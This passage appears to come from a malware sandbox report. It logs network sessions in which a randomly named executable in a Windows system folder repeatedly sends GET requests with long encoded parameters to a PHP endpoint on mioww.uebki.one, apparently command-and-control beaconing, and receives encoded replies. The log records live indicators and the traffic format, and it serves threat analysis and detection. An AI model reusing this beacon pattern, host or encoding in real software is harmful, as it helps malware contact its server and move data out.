                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:39.199090004 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEWlpnstr7NmLMzODjdADCMIc44duqxcoHbTR9bUxX0BfSfKim1TKfW%2BsGvPC6Hnm8e%2BBVbub%2FRmv00hznyGJUt99NnGw0uI%2BGtbL4rhP5x0kibIB6wOE7iTBB9%2F6ZxwG0c%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e86eb34424a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.4 | 49747 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:44.386066914 CEST2080OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:45.114552975 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCs6gLi%2B7x%2BlcS6SFizpIc4rr2YWO5CpTBP04EzUAYJhMdr%2BuLBq3Sl53pgLEzhA34bmODUR7hAtbs3zcZCj9KO%2FfxjaXbr3LpY4WOMop8OFYCF%2Fk5QvLNfcI765ZrjMKSU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8eabe948438d-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.4 | 49749 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:50.124222994 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:50.861068010 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SachSjczTrEowOqfo4P47tm1mHpuh8%2FNhTsDIbwUuN6fkXmkWH2ds%2F4rbjY4fi6jy8oXRMDwjRI5OVNbx7Gkx9ugqUo8yN%2BKTa8KcMLukr03oaBo0Gyt%2F6iP2fzCg4UNYkU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8ecfcb7bc35e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.4 | 49750 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:55.874167919 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:56.610280037 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASOK3mZm%2BkkRkh1CRO2PbTisAe1o0dmu9oBGqvbdxlzbNJyQP%2B3XflyA1cntmN7nNij9wz7HS4scBzOhQ8WA2cZ6jOJFA8fl2X%2FZYWWf5Uyg8idXwOrBP%2FBwTfJ28aZQnpU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8ef3b9674211-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              14 | 192.168.2.4 | 49751 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:01.632052898 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:02.354907036 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unEQqYafrgSS%2FITY9Ny%2BluuMHUDZ0Ysa7HhaQavLcOp7apk%2BkaPPNkdlc%2BpYk%2BM5pFz2zZ1SEGaZk7hzfhRn8ak5W0S6I8of8JW9RUWX43xP5teSbtPTAH9kKi7yYhmi8xM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f17ba0141c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              15 | 192.168.2.4 | 49752 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:07.373977900 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:08.109608889 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pw4ZpM6vOqqj04YCFvzOlQNvSlXdayxSvtLze1ZPoMrcFQx9wPInu4Z%2B1CscZG5%2BnizWhCBYRjZzyo3tt7EAMN%2BbwCIpl1Au%2B6skD3xfYwGlNrQ36wxyqo1SOXSx9orK6CQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f3ba9cb18bc-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              16 | 192.168.2.4 | 49753 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:13.124547958 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:13.870984077 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcRNsFC3uxaun1RGRRcwSpDxO%2FP28YBgVaskSw%2BoDv2SK%2Fzj61ToT23U96jtyYVQLctwRUnS7l%2F5s2eMn0yMjbr971ciokNeWJfm%2BXBzFCxxkAhczenCOnYu8zK0HMycZy4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f5faa030c9c-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              17 | 192.168.2.4 | 49754 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:18.897149086 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:19.623548031 CEST | 723 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBxt6fc5fyAaqEwWn8LqKdFQtctyD6NqGyVELFDIqVbC8FAHgV4CeiJCNYSWmI62fZxgNEgQgVnGpb19p4%2Bnxb6xLvOJYVHupZUoPoKoJA1Ggp7Lpsc8dP6lCxJoJAInxBk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f839c055e6a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              18 | 192.168.2.4 | 49755 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:24.665007114 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:25.407684088 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:25 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kC1PQcwPMxpj82uFiRGUOLJJjFHty%2FKhOLSyRGunNCAFVkUA66GMXPqb77MBemjzkcqIEAG1q6A80rIfAaPcT2WE4eLuP3vMvidVco5hUc29LzmSbPOqbZYu%2FW50DPVr%2Fg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fa7bfe01809-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              19 | 192.168.2.4 | 49756 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:30.421821117 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:31.156621933 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0B3YV5UPMeJnSn%2BJK32jLVDOJJMFNn0c6TUZJOGDptHWUwmuy8%2FzTqfQq4RuF8DpLnALOI51o62hEGnaIDA0ycqIrtMZ59oWjYKwzP39aR3e8TffZ%2FJo2xI998w7piPS5Ls%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fcbb9b041e3-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              20 | 192.168.2.4 | 49757 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:13:36.171247959 CEST2080OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:36.906351089 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
